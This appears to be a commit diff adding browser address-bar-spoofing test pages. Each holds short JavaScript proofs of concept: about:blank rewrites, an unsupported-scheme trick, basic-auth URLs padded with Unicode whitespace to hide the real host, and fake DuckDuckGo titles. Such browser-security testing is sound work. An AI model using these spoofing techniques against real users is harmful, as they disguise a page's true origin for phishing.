Add Address Bar Spoofing Test Cases (#169)

* Add simpler test case for address bar spoofing.

Rewrites current document without requiring navigation first. Also uses filtered ports, see: https://app.asana.com/0/1177771139624306/1205376531515103/f

* Update formatting.

* Add two more address bar spoofing tests and create directory for related test cases.

* Add basic auth test cases for address bar spoofing.

* Add test cases for about:blank rewrites, form action attack, base64 encoded document loads and unsupported schemes.

* * Add links for visibility
* Add title and run buttons where missing
* Update download URL from Google to something we own

* Delete spoof-js-page-rewrite.html

Author: not-a-rootkit

index.html

@@ -53,8 +53,8 @@ <h2>Browser Features</h2>
 <h2>Security</h2>
 
 <ul>
+	<li><a href="./security/address-bar-spoofing/">Address Bar Spoofing</a></li>
 	<li><a href="./security/dos-reload.html">Infinite location.reload() loop</a></li>
-	<li><a href="./security/spoof-js-page-rewrite.html">URL Spoofing - JS page rewrite</a></li>
 	<li><a href="./security/csp-report/index.html">Leak of extension IDs via CSP</a></li>
 	<li><a href="./security/js-leaks.html">Detect changes to JS objects in global scope</a></li>
 	<li><a href="./security/badware/phishing.html">An example phishing page</a></li>

security/address-bar-spoofing/index.html

@@ -0,0 +1,22 @@
+<!DOCTYPE html>
+<html>
+  <head>
+    <meta charset="UTF-8">
+    <title>Test Pages - Address Bar Spoofing</title>
+  </head>
+  <body>
+    <h1>Address Bar Spoofing Pages</h1>
+    <ul>
+        <li><a href="/security/address-bar-spoofing/spoof-about-blank-rewrite.html">About:Blank Rewrite Spoof</a></li>
+        <li><a href="/security/address-bar-spoofing/spoof-application-scheme.html">Unsupported Application Scheme Spoof</a></li>
+        <li><a href="/security/address-bar-spoofing/spoof-basicauth-2028.html">Basic Auth Parameter Spoof (\u2028)</a></li>
+        <li><a href="/security/address-bar-spoofing/spoof-basicauth-2029.html">Basic Auth Parameter Spoof (\u2029)</a></li>
+        <li><a href="/security/address-bar-spoofing/spoof-basicauth-whitespace.html">Basic Auth Parameter Spoof (Whitespace)</a></li>
+        <li><a href="/security/address-bar-spoofing/spoof-form-action.html">Form Action Spoof</a></li>
+        <li><a href="/security/address-bar-spoofing/spoof-js-download-url.html">Download URL Spoof</a></li>
+        <li><a href="/security/address-bar-spoofing/spoof-js-page-rewrite.html">Unsupported Application Scheme Spoof</a></li>
+        <li><a href="/security/address-bar-spoofing/spoof-open-b64-html.html">Unsupported Application Scheme Spoof</a></li>
+        <li><a href="/security/address-bar-spoofing/spoof-unsupported-scheme.html">Unsupported URL Scheme Spoof</a></li>
+    </ul>
+  </body>
+</html>

security/address-bar-spoofing/spoof-about-blank-rewrite.html

@@ -0,0 +1,29 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width">
+    <title>About:Blank Rewrite Spoof</title>
+    <script>
+        // eslint-disable-next-line no-unused-vars
+        function run() {
+            let win = open("about:blank");
+            win.document.write("<title>DuckDuckGo - Privacy, Simplified.</title>Not DDG.");
+            setTimeout(() => {
+                win.location = "https://duckduckgo.com/";
+                win.window.stop();
+            }, 500);
+        }
+    </script>
+</head>
+
+<body>
+    <p><a href="../index.html">[Home]</a></p>
+    This test will try to confuse the browser to show the wrong domain in the URL bar by opening an about:blank page,
+    rewriting the content, starting a navigation elsewhere and quickly stopping the
+    navigation using window.stop().
+    <button id="run" onclick="run()">Start</button>
+</body>
+
+</html>

security/address-bar-spoofing/spoof-application-scheme.html

@@ -0,0 +1,26 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width">
+    <title>URL Spoofing - Unsupported Application Scheme</title>
+    <script>
+        // eslint-disable-next-line no-unused-vars
+        function run() {
+            var t = window.open('filesystem:whatever', 'aa');
+            t.document.body.innerHTML = '<title>DuckDuckGo - Privacy Simplified</title><h1>Not DDG.</h1>';
+        }
+    </script>
+</head>
+
+<body>
+    <p><a href="../index.html">[Home]</a></p>
+    This test uses an unsupported application scheme and a href target to trick the browser into displaying the href
+    target as the current address bar value, while actually navigating to an attacker controlled page.
+    <a id="run" href="https://duckduckgo.com:" target="aa" onclick="setTimeout('run()',100)">
+        <h1>Start</h1>
+    </a>
+</body>
+
+</html>

security/address-bar-spoofing/spoof-basicauth-2028.html

@@ -0,0 +1,23 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width">
+    <title>URL Spoofing - Basic Auth Whitespace (2028)</title>
+    <script>
+        // eslint-disable-next-line no-unused-vars
+        function run() {
+            location = `https://www.google.com\[email protected]/`
+        }
+    </script>
+</head>
+
+<body>
+    <p><a href="../index.html">[Home]</a></p>
+    This test uses a unicode whitespace character (\u2028) inside the username field of the basicauth portion
+    of the URL to perform an address bar spoofing attack.
+    <button id="run" onclick="run()">run</button>
+</body>
+
+</html>

security/address-bar-spoofing/spoof-basicauth-2029.html

@@ -0,0 +1,23 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width">
+    <title>URL Spoofing - Basic Auth Whitespace (2029)</title>
+    <script>
+        // eslint-disable-next-line no-unused-vars
+        function run() {
+            location = `https://www.google.com\[email protected]/`
+        }
+    </script>
+</head>
+
+<body>
+    <p><a href="../index.html">[Home]</a></p>
+    This test uses a unicode whitespace character (\u2029) inside the username field of the basicauth portion
+    of the URL to perform an address bar spoofing attack.
+    <button id="run" onclick="run()">run</button>
+</body>
+
+</html>

security/address-bar-spoofing/spoof-basicauth-whitespace.html

@@ -0,0 +1,24 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width">
+    <title>URL Spoofing - Basic Auth Whitespace Repeated</title>
+    <script>
+        // eslint-disable-next-line no-unused-vars
+        function run() {
+            var whitespaces = "\u3000".repeat(300);
+            location = `https://www.google.com${whitespaces}@example.com/`;
+        }
+    </script>
+</head>
+
+<body>
+    <p><a href="../index.html">[Home]</a></p>
+    This test uses 300 repeated unicode whitespace characters inside the username field of the basicauth portion
+    of the URL to perform an address bar spoofing attack.
+    <button id="run" onclick="run()">run</button>
+</body>
+
+</html>

security/address-bar-spoofing/spoof-form-action.html

@@ -0,0 +1,26 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width">
+    <meta http-equiv="Content-Security-Policy" content="form-action https://duck.co" />
+    <title>URL Spoofing - Redirect Form Action</title>
+    <script>
+        // eslint-disable-next-line no-unused-vars
+        function run() {
+            document.forms[0].submit();
+        }
+    </script>
+</head>
+
+<body>
+    <p><a href="../index.html">[Home]</a></p>
+    This test uses a form action on a redirect URL to trick the browser into displaying the
+    redirect URL as the current address bar value, while trying to remain on the current page.
+    <button id="run" onclick="run()">run</button>
+    <form action="https://duck.co/">
+    </form>
+</body>
+
+</html>

security/address-bar-spoofing/spoof-js-download-url.html

@@ -0,0 +1,26 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width">
+  <title>URL Spoofing - Download URL</title>
+  <script>
+    // eslint-disable-next-line no-unused-vars
+    function run() {
+      const w = open()
+      w.opener = null
+      w.document.write('<h1>Not Third Party Site.</h1>')
+      w.location = 'https://bad.third-party.site/features/download/file/pdf'
+    }
+  </script>
+</head>
+
+<body>
+  <p><a href="../index.html">[Home]</a></p>
+  This test uses a download URL for downloading a file to spoof the browser into displaying the download
+  URL as the current origin while rewriting the document content to spoof the address bar.
+  <button onclick="run()">Start</button>
+</body>
+
+</html>

security/address-bar-spoofing/spoof-js-page-rewrite-simple.html

@@ -0,0 +1,26 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width">
+    <title>URL Spoofing - Simple JS page rewrite</title>
+    <script>
+        // eslint-disable-next-line no-unused-vars
+        function run () {
+            document.write('Not DDG.<br>');
+            document.location = 'https://duckduckgo.com:8443';
+        }
+    </script>
+</head>
+
+<body>
+    <p><a href="../index.html">[Home]</a></p>
+
+    This test will try to confuse the browser to show the wrong domain in the URL bar by rewriting the current page
+    content and loading a URL that will timeout.
+
+    <button onclick="run()">Start</button>
+</body>
+
+</html>